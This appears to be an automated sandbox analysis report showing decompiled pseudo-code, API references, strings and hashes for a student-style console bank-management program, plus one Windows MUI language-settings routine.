_wprintf.LIBCMT ref: 012B2869

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

Part of subcall function 012B12F0: _wprintf.LIBCMT ref: 012B1329

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_swscanf.LIBCMT ref: 012B28AA

Part of subcall function 012B7021: _vfscanf.LIBCMT ref: 012B7035

_wprintf.LIBCMT ref: 012B2914
_wprintf.LIBCMT ref: 012B292F
_swscanf.LIBCMT ref: 012B2994
_fprintf.LIBCMT ref: 012B29E3
_swscanf.LIBCMT ref: 012B2A5E
_fprintf.LIBCMT ref: 012B2AC2
_wprintf.LIBCMT ref: 012B2AFF

Strings

LOG.DAT, xrefs: 012B2A10
USER.DAT, xrefs: 012B2952
%s %s %s %s, xrefs: 012B2AB6
%s %s %s, xrefs: 012B289E
%s %s %s, xrefs: 012B2988
Record DELETED successfully!, xrefs: 012B2AFA
USER.DAT, xrefs: 012B287F
%s %s %s, xrefs: 012B29D8
Are you sure you want to DELETE this user? <Y/N> : , xrefs: 012B292A
temp.dat, xrefs: 012B2969
temp.dat, xrefs: 012B2A27
%s %s %s %s, xrefs: 012B2A52
User Name : , xrefs: 012B283C
Password : , xrefs: 012B2864

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
API String ID: 3163849712-4002591224
Opcode ID: f7aa6cd5f52c1f75f97933c2ecfa272c74e799592ad8726981822e4885d42955
Instruction ID: 2a7c25b3c157bfe5c5677f377f4f9e22ea153e67f13fca6477a5832a657d8706
Opcode Fuzzy Hash: f7aa6cd5f52c1f75f97933c2ecfa272c74e799592ad8726981822e4885d42955
Instruction Fuzzy Hash: F77197B2D70306AFD715EBE4ECC2EFE7265AB35B80F04466DE605A1144F671A2448772

Uniqueness

Uniqueness Score: -1.00%

Function 012B25C0, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E012B25C0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v15;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v76;
				char _v108;
				char _v140;
				void* __ebp;
				intOrPtr _t42;
				void* _t44;
				intOrPtr _t53;
				intOrPtr _t58;
				intOrPtr _t67;
				void* _t70;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t79;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t103;

				_t103 = __fp0;
				_t84 = __esi;
				_t83 = __edi;
				_t73 = __ebx;
				_v8 = 0;
				_v12 = 0;
				_v76 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v44 = 0;
				_t74 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				do {
					E012B20E0(_t74, _t83, _t84, 0, _t103);
					_v8 = 0;
					E012B12B0(0x19, 8);
					_push("User Name        : ");
					E012B715C(_t73, _t83, _t84, 0);
					E012B738B("%s", 0x12d2ee4);
					_t42 = E012B6EF1("USER.DAT", "r");
					_t88 = _t85 + 0x14;
					 *0x12d2f28 = _t42;
					_v12 = 0;
					while(1) {
						_push( &_v140);
						_push( &_v108);
						_t75 =  *0x12d2f28; // 0x0
						_t44 = E012B7021(_t75, "%s %s %s\n", 0x12d2ee0);
						_t89 = _t88 + 0x14;
						if(_t44 == 0xffffffff) {
							goto L6;
						}
						_t70 = E012B8230( &_v108, 0x12d2ee4);
						_t88 = _t89 + 8;
						if(_t70 == 0) {
							_v12 = _v12 + 1;
						}
					}
					L6:
					_t74 =  *0x12d2f28; // 0x0
					_push(_t74);
					E012B6DB6(_t73, _t83, _t84, __eflags);
					_t90 = _t89 + 4;
					__eflags = _v12;
					if(__eflags == 0) {
						E012B12B0(0x19, 0xa);
						_push("Password         : ");
						E012B715C(_t73, _t83, _t84, __eflags);
						E012B12F0(_t83, _t84,  &_v76);
						E012B12B0(0x19, 0xc);
						_push("Confirm Password : ");
						E012B715C(_t73, _t83, _t84, __eflags);
						_t74 =  &_v44;
						E012B12F0(_t83, _t84,  &_v44);
						_t53 = E012B8230(0x12d2f02,  &_v44);
						_t85 = _t90 + 0x10;
						__eflags = _t53;
						if(__eflags != 0) {
							E012B20E0( &_v44, _t83, _t84, __eflags, _t103);
							E012B12B0(0xa, 0xa);
							_push(0x12cf444);
							E012B715C(_t73, _t83, _t84, __eflags);
							_t85 = _t85 + 4;
							_t67 = _v8 + 1;
							__eflags = _t67;
							_v8 = _t67;
						}
					} else {
						E012B12B0(0xa, 0xa);
						_push(0x12cf3e0);
						E012B715C(_t73, _t83, _t84, __eflags);
						_t85 = _t90 + 4;
						_v8 = _v8 + 1;
					}
					__eflags = _v8;
				} while (__eflags != 0);
				 *0x12d2f28 = E012B6EF1("USER.DAT", 0x12cf474);
				_t76 =  *0x12d2f28; // 0x0
				_push(_t76);
				E012B6DB6(_t73, _t83, _t84, __eflags);
				 *0x12d2f28 = E012B6EF1("USER.DAT", "a");
				_push(0x12d2f02);
				_push(0x12d2ee4);
				_push(0x12d2ee0);
				_push("%s %s %s\n");
				_t79 =  *0x12d2f28; // 0x0
				_push(_t79);
				E012B6F06(_t73, _t83, _t84, __eflags);
				_t58 =  *0x12d2f28; // 0x0
				_push(_t58);
				E012B6DB6(_t73, _t83, _t84, __eflags);
				E012B20E0(_t76, _t83, _t84, __eflags, _t103);
				E012B12B0(0x19, 0xa);
				_push("Record ADDED successfully!");
				return E012B715C(_t73, _t83, _t84, __eflags);
			}

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B262D
_wscanf.LIBCMT ref: 012B263F

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_swscanf.LIBCMT ref: 012B2681

Part of subcall function 012B7021: _vfscanf.LIBCMT ref: 012B7035

_wprintf.LIBCMT ref: 012B26D1
_wprintf.LIBCMT ref: 012B26F2
_wprintf.LIBCMT ref: 012B2711
_wprintf.LIBCMT ref: 012B274A
_fprintf.LIBCMT ref: 012B27BD
_wprintf.LIBCMT ref: 012B27E6

Strings

Password : , xrefs: 012B26ED
Confirm Password : , xrefs: 012B270C
USER.DAT, xrefs: 012B276A
%s %s %s, xrefs: 012B27B1
%s %s %s, xrefs: 012B2675
User Name : , xrefs: 012B2628
Record ADDED successfully!, xrefs: 012B27E1
USER.DAT, xrefs: 012B2790
USER.DAT, xrefs: 012B264C

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
API String ID: 3917209068-3252730458
Opcode ID: 0a2be336f17e0735959aa3c8891117f14767667f11b9d1cbb5f447c1de227352
Instruction ID: 1c10ff2d7775b7bb153e5200b1c0af3bc5a12ea69a07725f996d8d5331b0b8c8
Opcode Fuzzy Hash: 0a2be336f17e0735959aa3c8891117f14767667f11b9d1cbb5f447c1de227352
Instruction Fuzzy Hash: AA51C3B1E70306EFDB14EFA4ED82BED7671AF25B84F04456DE604B2280E6B062548766

Uniqueness

Uniqueness Score: -1.00%

Function 012B21E0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E012B21E0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* __ebp;
				void* _t28;
				intOrPtr _t31;
				void* _t34;
				void* _t35;
				void* _t36;

				_t33 = __esi;
				_t32 = __edi;
				E012B1380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
				E012B12B0(0x1b, 4);
				_push("BANK MANAGEMENT //");
				E012B715C(_t28, __edi, __esi, __eflags);
				_t35 = _t34 + 4;
				E012B12B0(0x19, 5);
				_v8 = 0;
				while(1) {
					_t42 = _v8 - 0x1b;
					if(_v8 >= 0x1b) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E012B715C(_t28, _t32, _t33, _t42);
					_t35 = _t35 + 8;
					_v8 = _v8 + 1;
				}
				E012B12B0(0x19, 8);
				_push("Designed and Programmed by:");
				E012B715C(_t28, _t32, _t33, __eflags);
				_t36 = _t35 + 4;
				E012B12B0(0x19, 9);
				_v8 = 0;
				while(1) {
					__eflags = _v8 - 0x1b;
					if(__eflags >= 0) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E012B715C(_t28, _t32, _t33, __eflags);
					_t36 = _t36 + 8;
					_t31 = _v8 + 1;
					__eflags = _t31;
					_v8 = _t31;
				}
				E012B12B0(0x21, 0xb);
				_push("Ravi Agrawal");
				E012B715C(_t28, _t32, _t33, __eflags);
				E012B12B0(0x21, 0xd);
				_push("Sagar Sharma");
				E012B715C(_t28, _t32, _t33, __eflags);
				E012B12B0(0x21, 0xf);
				_push("Sawal Maskey");
				E012B715C(_t28, _t32, _t33, __eflags);
				E012B12B0(0x18, 0x14);
				_push("Press Any key to continue...");
				return E012B715C(_t28, _t32, _t33, __eflags);
			}

APIs

Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B139D
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13DB
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13FC
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1470
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1493

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B21FF
_wprintf.LIBCMT ref: 012B2232

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B224A
_wprintf.LIBCMT ref: 012B227D
_wprintf.LIBCMT ref: 012B2295
_wprintf.LIBCMT ref: 012B22AB
_wprintf.LIBCMT ref: 012B22C1
_wprintf.LIBCMT ref: 012B22D7

Strings

BANK MANAGEMENT //, xrefs: 012B21FA
Sagar Sharma, xrefs: 012B22A6
Sawal Maskey, xrefs: 012B22BC
Designed and Programmed by:, xrefs: 012B2245
Ravi Agrawal, xrefs: 012B2290
Press Any key to continue..., xrefs: 012B22D2

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
API String ID: 1778593935-2888666035
Opcode ID: addb6cd2c5e792c2a91be8345898017bc3f4b4b2d646bd283625f8cab28d6239
Instruction ID: 934515244b517b4a70a4acc0a8a2504008daff2db19f4757498953b38f096412
Opcode Fuzzy Hash: addb6cd2c5e792c2a91be8345898017bc3f4b4b2d646bd283625f8cab28d6239
Instruction Fuzzy Hash: 2C2160B0AB0306B6FB197BE46D93FEA71215B61FC4F010228FB05792C2E9F1261452A7

Uniqueness

Uniqueness Score: -1.00%

Function 012B20E0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E012B20E0(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				void* __ebp;
				void* _t9;
				intOrPtr _t16;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t37;

				_t37 = __fp0;
				_t23 = __esi;
				_t22 = __edi;
				E012B1380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
				E012B12B0(0x19, 1);
				_push("Banking Management //");
				E012B715C(_t20, __edi, __esi, __eflags);
				E012B12B0(5, 3);
				_t9 = E012B8230(0x12d2ee4, "Admin");
				_t26 = _t24 + 0xc;
				if(_t9 == 0) {
					 *0x12d2240 = 1;
				}
				_t34 =  *0x12d2240;
				if( *0x12d2240 == 0) {
					_push(0x12d2ee4);
					_push("Current User : %s");
					E012B715C(_t20, _t22, _t23, __eflags);
					_t27 = _t26 + 8;
				} else {
					_push("Current User : Admin");
					E012B715C(_t20, _t22, _t23, _t34);
					_t27 = _t26 + 4;
				}
				_push("\t\t\t\tDate : ");
				E012B715C(_t20, _t22, _t23, _t34);
				E012B834B(_t34, 0x12d2f40);
				_push(0x12d2f40);
				E012B16A0(_t22, _t23, _t37);
				_push(0x12d2f40);
				_push("%s");
				E012B715C(_t20, _t22, _t23, _t34);
				E012B834B(_t34, 0x12d2f40);
				_t31 = _t27 + 0x14;
				_t16 = E012B12B0(1, 5);
				_v8 = 0;
				while(1) {
					_t35 = _v8 - 0x4e;
					if(_v8 >= 0x4e) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E012B715C(_t20, _t22, _t23, _t35);
					_t31 = _t31 + 8;
					_t16 = _v8 + 1;
					_v8 = _t16;
				}
				return _t16;
			}

APIs

Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B139D
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13DB
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13FC
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1470
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1493

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B20FF
_wprintf.LIBCMT ref: 012B213E
_wprintf.LIBCMT ref: 012B2152

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B215F
__wstrtime.LIBCMT ref: 012B216C
_wprintf.LIBCMT ref: 012B2188
__wstrtime.LIBCMT ref: 012B2195
_wprintf.LIBCMT ref: 012B21C8

Strings

Date : , xrefs: 012B215A
Admin, xrefs: 012B2110
Current User : %s, xrefs: 012B214D
N, xrefs: 012B21B8
Current User : Admin, xrefs: 012B2139
Banking Management //, xrefs: 012B20FA

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
API String ID: 3817360410-644830535
Opcode ID: d6a1b32d8c7a9f353faecb17ea1228a6dbac50dbb9e46fd4a34820d3113dc890
Instruction ID: 9a4b2a2d5535589cada9b91be97fa0df1d1d37f5a471650b1a785be17e8ab7de
Opcode Fuzzy Hash: d6a1b32d8c7a9f353faecb17ea1228a6dbac50dbb9e46fd4a34820d3113dc890
Instruction Fuzzy Hash: 74114FB0EF0302FAE7187BA1EC87FE931159B31B86F040168FA08352D2E5E13654426B

Uniqueness

Uniqueness Score: -1.00%

Function 00938788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00938788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00938460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0091E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0093718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00938460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0093718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00938460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00938460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00938460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0093718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00912340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0092E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0091E2A8(_t322,  &_v68, _v16);
								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0092E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0091E2A8(_t322,  &_v68, _t236);
								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0093718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00912340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0092E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0091E2A8(_v12,  &_v68, _v16);
							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0092E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0091E2A8(_t322,  &_v68, _t269);
							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0093718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00912340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0092E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0091E2A8(_v12,  &_v68, _v16);
						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0092E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0091E2A8(_t322,  &_v68, _t296);
						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00938788
0x00938788
0x00938791
0x00938794
0x00938798
0x0093879b
0x0093879e
0x009387a1
0x009387a4
0x009387a7
0x009387aa
0x009387af
0x00981ad3
0x00938b0a
0x00938b0d
0x00938b13
0x00938b19
0x00938b1f
0x00938b25
0x00938b2b
0x00938b31
0x00938b37
0x00938b3d
0x00938b46
0x00938b46
0x009387c6
0x009387d0
0x00981ae0
0x00981ae6
0x00981af8
0x00981af8
0x00981afd
0x00981afe
0x00981b01
0x00981b06
0x00981b06
0x009387d6
0x009387f2
0x009387f7
0x00938807
0x0093880a
0x0093880f
0x00938810
0x00938813
0x00938818
0x00938818
0x0093882c
0x00938831
0x00938838
0x00938908
0x00938920
0x009389f0
0x00938a08
0x00938af6
0x00938af6
0x00938af8
0x00938afb
0x00981beb
0x00981beb
0x00938b04
0x00981bf8
0x00981c0e
0x00981c13
0x00981c16
0x00981c16
0x00981bf8
0x00000000
0x00938b04
0x00938a0e
0x00938a11
0x00938a14
0x00938a15
0x00938a18
0x00938a22
0x00938b59
0x00938a28
0x00938a3c
0x00938a3c
0x00938a42
0x00981bb0
0x00981b11
0x00981b11
0x00000000
0x00938a48
0x00938a51
0x00938a5b
0x00938a5e
0x00938a61
0x00938a69
0x00938a69
0x00938a6d
0x00000000
0x00000000
0x00938a74
0x00938a7c
0x00938a7d
0x00938a91
0x00938a93
0x00938a93
0x00938a98
0x00938a9b
0x00938aa1
0x00938aa1
0x00938aa4
0x00938aaa
0x00938ab1
0x00938ac5
0x00938ac7
0x00938ac7
0x00938ac5
0x00938ace
0x00981bc9
0x00981bce
0x00981bd2
0x00981bd2
0x00938ad8
0x00938aeb
0x00938aeb
0x00938af0
0x00938af4
0x00000000
0x00938af4
0x00938a42
0x00938926
0x00938929
0x0093892c
0x0093892d
0x00938930
0x00938935
0x0093893a
0x00938b51
0x00938940
0x00938954
0x00938954
0x0093895a
0x00981b63
0x00000000
0x00938960
0x00938969
0x00938973
0x00938976
0x00938979
0x0093897e
0x00938981
0x00938981
0x00938986
0x00000000
0x00000000
0x00981b6e
0x00981b74
0x00981b7b
0x00981b8f
0x00981b91
0x00981b91
0x00981b99
0x00981b9c
0x00981ba2
0x00981ba2
0x0093898c
0x00938992
0x00938999
0x009389ad
0x00981ba8
0x00981ba8
0x009389ad
0x009389b6
0x009389c8
0x009389cd
0x009389d0
0x009389d0
0x009389d6
0x009389e8
0x009389e8
0x009389ed
0x00000000
0x009389ed
0x0093895a
0x0093883e
0x00938841
0x00938844
0x00938845
0x00938848
0x0093884d
0x00938852
0x00938b49
0x00938858
0x0093886c
0x0093886c
0x00938872
0x00981b0e
0x00000000
0x00938878
0x00938881
0x0093888b
0x0093888e
0x00938891
0x00938896
0x00938899
0x00938899
0x0093889e
0x00000000
0x00000000
0x00981b21
0x00981b27
0x00981b2e
0x00981b42
0x00981b44
0x00981b44
0x00981b4c
0x00981b4f
0x00981b55
0x00981b55
0x009388a4
0x009388aa
0x009388b1
0x009388c5
0x00981b5b
0x00981b5b
0x009388c5
0x009388ce
0x009388e0
0x009388e5
0x009388e8
0x009388e8
0x009388ee
0x00938900
0x00938900
0x00938905
0x00000000
0x00938905

APIs

_wcspbrk.LIBCMT ref: 00938891
_wcspbrk.LIBCMT ref: 00938979
_wcspbrk.LIBCMT ref: 00938A61
_wcspbrk.LIBCMT ref: 00938A9B
_wcspbrk.LIBCMT ref: 00981B9C

Strings

